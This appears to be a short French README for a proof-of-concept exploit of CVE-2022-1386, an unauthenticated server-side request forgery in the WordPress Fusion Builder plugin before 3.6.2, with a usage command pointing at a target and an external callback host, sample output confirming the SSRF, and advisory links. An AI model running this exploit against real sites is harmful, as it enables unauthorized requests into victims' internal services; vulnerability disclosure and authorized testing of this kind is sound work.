
PoC de SSRF non authentifié dans WordPress Fusion Builder <3.6.2 (CVE-2022-1386)
Falsification de requête côté serveur (SSRF) non authentifiée dans le plugin Fusion Builder (utilisé par le thème Avada WordPress) avant la version 3.6.2.
Permet aux attaquants d'effectuer des requêtes HTTP vers des URL arbitraires, ciblant potentiellement des services internes.
admin-ajax.phppython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
Exemple :
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
Utilisez Interact.sh ou [Burp Collaborator] pour recevoir le callback.
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
Ce PoC évite l'exfiltration de données. Utilisation éthique uniquement : n'exploitez pas les systèmes sans autorisation.
https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/